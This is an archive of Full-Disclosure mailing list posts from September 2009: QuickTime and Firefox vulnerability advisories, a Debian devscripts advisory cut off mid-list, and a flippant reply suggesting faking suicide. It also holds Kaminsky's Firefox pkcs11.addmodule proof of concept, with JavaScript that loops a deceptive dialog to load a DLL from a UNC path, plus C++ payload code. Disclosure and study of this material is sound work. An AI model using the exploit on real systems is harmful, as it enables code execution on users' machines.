Hosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Question about police harassment. Police trying over years to "entrap" me as hacker.

[T Biehn]

MrX,
Dude.
Just fake your own suicide. This old school trick will solicit the
feds to your locale if you're actually being watched.

Other advice?

I want voice recordings, jpegs, vlog posts, else it didn't happen &
you're schizoid.

-Travis

On Wed, Sep 9, 2009 at 11:04 PM, Nick FitzGerald
 wrote:
> TheLearner wrote:
>
> <>
>> What would you do?
>
> I'm not sure what _I_ would do facing such a crisis, but I think the
> best thing for _you_ to do is hire n3td3v and Gary McKinnon's lawyer
> (s/he has been posting to this list lately, so should be easy to track
> down), and then get those two uber hackers to help as well -- they'll
> be much more help _to you_ than any private eye ever will...
>
>
>
> Regards,
>
> Nick FitzGerald
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Question about police harassment. Police trying over years to "entrap" me as hacker.

[mrx]

*
*We have a code 4 on that 10-103m

regards
the real MrX


T Biehn wrote:
> MrX,
> Dude.
> Just fake your own suicide. This old school trick will solicit the
> feds to your locale if you're actually being watched.
>
> Other advice?
>
> I want voice recordings, jpegs, vlog posts, else it didn't happen &
> you're schizoid.
>
> -Travis
>
> On Wed, Sep 9, 2009 at 11:04 PM, Nick FitzGerald
>  wrote:
>   
>> TheLearner wrote:
>>
>> <>
>> 
>>> What would you do?
>>>   
>> I'm not sure what _I_ would do facing such a crisis, but I think the
>> best thing for _you_ to do is hire n3td3v and Gary McKinnon's lawyer
>> (s/he has been posting to this list lately, so should be easy to track
>> down), and then get those two uber hackers to help as well -- they'll
>> be much more help _to you_ than any private eye ever will...
>>
>>
>>
>> Regards,
>>
>> Nick FitzGerald
>>
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>> 
>
>
>
>   

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Firefox <3.0.14 Multiplatform RCE via pkcs11.addmodule

[Dan Kaminsky]

Fix announce:
http://www.mozilla.org/security/announce/2009/mfsa2009-48.html
Bug history: https://bugzilla.mozilla.org/show_bug.cgi?id=326628

So, Firefox up through 3.0.13 had an obscure little function under
window.pkcs11:

 long  addmodule(in DOMString moduleName,
 in DOMString libraryFullPath,
 in long cryptoMechanismFlags,
 in long cipherFlags);

Yes, that's actually the full path to a DLL -- or an .so on Linux/OSX --
from a JS function that's exposed to the web.

Attacker doesn't get zero click install -- there's a dialog -- but:

1) Attacker does get to customize the dialog via moduleName
2) The dialog is modal, so the user doesn't get access to Firefox again
until they hit OK (can't even close Firefox)
3) On Windows, he can put a UNC path in for the Library path.  There's
probably similar on OSX and some Linux distros.  Even without, there's
usually a way to get a file in a known location -- see John Heasman's Java
work.

LoadLibrary of Attacker library on OK.

Repro:




  var str = "Error detected in Firefox Module NSP31337.bin.\n" +
   "Please click 'OK' to repair."

  ret=-2;
  while(ret!=-5){
 ret=window.pkcs11.addmodule("\n\n\n" + str + "\n\n\n",
"127.0.0.1\\c$\\
pkunkcs", 0, 0);
  }



"Shellcode" is just a DLL with ShellExecute in the constructor:

CpkunkcsApp::CpkunkcsApp()
{

char *str = "c:\\windows\\system32\\calc.exe";
wchar_t *wText;
size_t len;

len = strlen(str)+1;

wText = new wchar_t[strlen(str)];
memset(wText, 0, len * sizeof(wchar_t));

::MultiByteToWideChar(CP_ACP, NULL, str, -1, wText, len);

ShellExecute(NULL, NULL, wText, NULL, NULL, SW_SHOW);

}

Cheers to Jesse Ruderman, who recognized this was probably not the greatest
of API's some time ago.  The bug history is worth taking a look at...goes
back a while.  They missed the UNC path vector, and appear to have
underestimated the modal dialog.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] ZDI-09-063: Apple QuickTime H.264 Nal Unit Length Heap Overflow Vulnerability

[ZDI Disclosures]

ZDI-09-063: Apple QuickTime H.264 Nal Unit Length Heap Overflow
Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-09-063
September 10, 2009

-- CVE ID:
CVE-2009-2799

-- Affected Vendors:
Apple

-- Affected Products:
Apple Quicktime

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 8435.
For further product information on the TippingPoint IPS, visit:

http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Apple QuickTime. User interaction is
required to exploit this vulnerability in that the target must visit a
malicious page or open a malicious file.

The specific flaw exists during the parsing of samples from a malformed
MOV file utilizing the H.264 codec. While parsing data to render the
stream, the application will mistrust a length that is used to
initialize a heap chunk that was allocated in a header. If the length is
larger than the size of the chunk allocated, then a memory corruption
will occur leading to code execution under the context of the currently
logged in user.

-- Vendor Response:
Apple has issued an update to correct this vulnerability. More
details can be found at:

http://support.apple.com/kb/HT3859

-- Disclosure Timeline:
2009-07-28 - Vulnerability reported to vendor
2009-09-10 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Anonymous
* Damian Put

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

http://www.zerodayinitiative.com/advisories/disclosure_policy/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] ZDI-09-064: Apple QuickTime FlashPix Sector Size Overflow Vulnerability

[ZDI Disclosures]

ZDI-09-064: Apple QuickTime FlashPix Sector Size Overflow Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-09-064
September 10, 2009

-- CVE ID:
CVE-2009-2798

-- Affected Vendors:
Apple

-- Affected Products:
Apple Quicktime

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 8414.
For further product information on the TippingPoint IPS, visit:

http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Apple QuickTime. User interaction is
required to exploit this vulnerability in that the target must visit a
malicious page or open a malicious file.

The specific flaw exists during the parsing of malformed FlashPix (.fpx)
files. While parsing the SectorShift and cSectFat fields from the
header, the application will multiply 2 user-controlled 32-bit values
and utilize this for an allocation. If the result of the multiplication
is greater than 32bits, the application will allocate an undersized heap
chunk. Later, the application will copy file data directly into this
buffer leading to a buffer overflow which can allow for code execution
under the context of the currently logged in user.

-- Vendor Response:
Apple has issued an update to correct this vulnerability. More
details can be found at:

http://support.apple.com/kb/HT3859

-- Disclosure Timeline:
2009-07-28 - Vulnerability reported to vendor
2009-09-10 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Damian Put

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

http://www.zerodayinitiative.com/advisories/disclosure_policy/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] ZDI-09-065: Mozilla Firefox TreeColumns Dangling Pointer Vulnerability

[ZDI Disclosures]

ZDI-09-065: Mozilla Firefox TreeColumns Dangling Pointer Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-09-065
September 10, 2009

-- CVE ID:
CVE-2009-3077

-- Affected Vendors:
Mozilla Firefox

-- Affected Products:
Mozilla Firefox 3

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 8442.
For further product information on the TippingPoint IPS, visit:

http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Mozilla Firefox. User interaction is
required to exploit this vulnerability in that the target must visit a
malicious page.

The specific flaw exists during the redrawing of tree columns contained
within a XUL document. Due to the reuse of a previously freed object,
attacker controlled memory can be executed. Successful exploitation of
this vulnerability can lead to remote compromise of the affected system
under the credentials of the currently logged in user.

-- Vendor Response:
Mozilla Firefox has issued an update to correct this vulnerability. More
details can be found at:

http://www.mozilla.org/security/announce/2009/mfsa2009-49.html

-- Disclosure Timeline:
2009-07-28 - Vulnerability reported to vendor
2009-09-10 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Anonymous

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

http://www.zerodayinitiative.com/advisories/disclosure_policy/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Plain Text Password Disclosure vulnerability in rediff mail

[awf awf]

And?  Every web application sends passwords as plain text unless they are using 
SSL.  Pretty much any "encryption" that they may do client side that isn't SSL 
is meaningless.  I hardly see how being able to sniff passwords from a site 
that isn't using SSL is big news.

_
Windows Live: Make it easier for your friends to see what you’re up to on 
Facebook.
http://windowslive.com/Campaign/SocialNetworking?ocid=PID23285::T:WLMTAGL:ON:WL:en-US:SI_SB_facebook:082009___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Plain Text Password Disclosure vulnerability in rediff mail

[Dan Kaminsky]

Beyond that, most web applications that do use SSL, still forget to set
their cookies to secure (see
http://fscked.org/blog/incomplete-list-alleged-vulnerable-sites ).  Not to
mention the hordes of sites that have SSL logins off HTTP pages.  Even the
oft-repeated "well, the attacker won't get the plaintext password" claim
falls to the attacker who inserts some screen or keyboard sniffing JS into
the login page.

That being said, there probably is some class of attacker that can only do
passive monitoring as opposed to active interception.  But it's not exactly
a quantization to hang one's hat on.


On Thu, Sep 10, 2009 at 5:36 PM, awf awf  wrote:

>  And?  Every web application sends passwords as plain text unless they are
> using SSL.  Pretty much any "encryption" that they may do client side that
> isn't SSL is meaningless.  I hardly see how being able to sniff passwords
> from a site that isn't using SSL is big news.
>
> --
> Windows Live: Make it easier for your friends to see what you’re up to on
> Facebook. Find out 
> more.
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Friday the 11th of September 2009

[full-censorship]

Dan Kaminsky appears on full-disclosure mailing list and disses 
other people while his domain is still offline because of zf0.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Plain Text Password Disclosure vulnerability in rediff mail

[dramacrat]

fuck.kaminsky

2009/9/11 Dan Kaminsky 

> Beyond that, most web applications that do use SSL, still forget to set
> their cookies to secure (see
> http://fscked.org/blog/incomplete-list-alleged-vulnerable-sites ).  Not to
> mention the hordes of sites that have SSL logins off HTTP pages.  Even the
> oft-repeated "well, the attacker won't get the plaintext password" claim
> falls to the attacker who inserts some screen or keyboard sniffing JS into
> the login page.
>
> That being said, there probably is some class of attacker that can only do
> passive monitoring as opposed to active interception.  But it's not exactly
> a quantization to hang one's hat on.
>
>
>  On Thu, Sep 10, 2009 at 5:36 PM, awf awf  wrote:
>
>>  And?  Every web application sends passwords as plain text unless they
>> are using SSL.  Pretty much any "encryption" that they may do client side
>> that isn't SSL is meaningless.  I hardly see how being able to sniff
>> passwords from a site that isn't using SSL is big news.
>>
>> --
>> Windows Live: Make it easier for your friends to see what you’re up to on
>> Facebook. Find out 
>> more.
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [SECURITY] [DSA 1878-2] New devscripts packages fix regressions

[Florian Weimer]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- 
Debian Security Advisory DSA-1878-2  secur...@debian.org
http://www.debian.org/security/   Florian Weimer
September 11, 2009http://www.debian.org/security/faq
- 

Package: devscripts
Vulnerability  : missing input sanitation
Problem type   : remote
Debian-specific: yes
CVE Id(s)  : CVE-2009-2946

This update corrects regressions introduced by the devscripts security
update, DSA-1878-1.  The original announcement was:

Raphael Geissert discovered that uscan, a program to check for
availability of new source code versions which is part of the
devscripts package, runs Perl code downloaded from potentially
untrusted sources to implement its URL and version mangling
functionality.  This update addresses this issue by reimplementing the
relevant Perl operators without relying on the Perl interpreter,
trying to preserve backwards compatibility as much as possible.

For the old stable distribution (etch), this problem has been fixed in
version 2.9.26etch5.

For the stable distribution (lenny), this problem has been fixed in
version 2.10.35lenny7.

For the unstable distribution (sid), this problem will be fixed in
version 2.10.55.

We recommend that you upgrade your devscripts package.

Upgrade instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
- ---

Source archives:

  
http://security.debian.org/pool/updates/main/d/devscripts/devscripts_2.9.26etch5.dsc
Size/MD5 checksum:  682 c3d21fb270f822e5392ae2106788187f
  
http://security.debian.org/pool/updates/main/d/devscripts/devscripts_2.9.26etch5.tar.gz
Size/MD5 checksum:   432873 f32096a7e9ee2072772cd2b9f681345f

alpha architecture (DEC Alpha)

  
http://security.debian.org/pool/updates/main/d/devscripts/devscripts_2.9.26etch5_alpha.deb
Size/MD5 checksum:   390248 da966fdac92abcaafa1430b8ba675abd

amd64 architecture (AMD x86_64 (AMD64))

  
http://security.debian.org/pool/updates/main/d/devscripts/devscripts_2.9.26etch5_amd64.deb
Size/MD5 checksum:   399932 db2a46b29128469d5ecb92cb9b41e0ca

arm architecture (ARM)

  
http://security.debian.org/pool/updates/main/d/devscripts/devscripts_2.9.26etch5_arm.deb
Size/MD5 checksum:   397770 ee1bbcf45311c38f33081824a9dd5e52

hppa architecture (HP PA RISC)

  
http://security.debian.org/pool/updates/main/d/devscripts/devscripts_2.9.26etch5_hppa.deb
Size/MD5 checksum:   400568 2076bd94592f6396842b7d6c8524c6ce

i386 architecture (Intel ia32)

  
http://security.debian.org/pool/updates/main/d/devscripts/devscripts_2.9.26etch5_i386.deb
Size/MD5 checksum:   395166 838abce05486685bfe341dbc61de4522

ia64 architecture (Intel ia64)

  
http://security.debian.org/pool/updates/main/d/devscripts/devscripts_2.9.26etch5_ia64.deb
Size/MD5 checksum:   391662 5872f444be695efce63935c5702b9b0c

mips architecture (MIPS (Big Endian))

  
http://security.debian.org/pool/updates/main/d/devscripts/devscripts_2.9.26etch5_mips.deb
Size/MD5 checksum:   397248 f99f1452a7fd42b38bfbc76f6b90172c

mipsel architecture (MIPS (Little Endian))

  
http://security.debian.org/pool/updates/main/d/devscripts/devscripts_2.9.26etch5_mipsel.deb
Size/MD5 checksum:   390184 87ec766449c652595e79a7c7032fcb16

powerpc architecture (PowerPC)

  
http://security.debian.org/pool/updates/main/d/devscripts/devscripts_2.9.26etch5_powerpc.deb
Size/MD5 checksum:   392430 aa784cbdb2826f2d4b97ed56ba3561cd

s390 architecture (IBM S/390)

  
http://security.debian.org/pool/updates/main/d/devscripts/devscripts_2.9.26etch5_s390.deb
Size/MD5 checksum:   390094 61191453fd34ce9e394869462d0922c5

sparc architecture (Sun SPARC/UltraSPARC)

  
http://security.debian.org/pool/updates/main/d/devscripts/devscripts_2.9.26etch5_sparc.deb
Size/MD5 checksum:   398526 eb9949901ea3e2d5536cbd4d83ae5bc9

Debian GNU/Linux 5.0 alias lenny
- 

Source archives:

  
http://security.debian.org/pool/updates/main/d/devscripts/devscripts_2.10.35lenny7.tar.gz
Size/MD5 checksum:   602728 618e6dd31e49ca4e2e8bf27dc47e0846
  
http://security.debian.org/pool/updates/main/d/devscripts/devscripts_2.10.35lenny7.dsc
Size/MD5 checksum: 1417 3e86ddb193d12c2ce63a9666904754bf

alpha architecture (DEC Alpha)

  
http://security.debian.org/pool/updates/main/d/devscripts/devscripts_2.10.35lenny7_alpha.deb
Size/MD5 c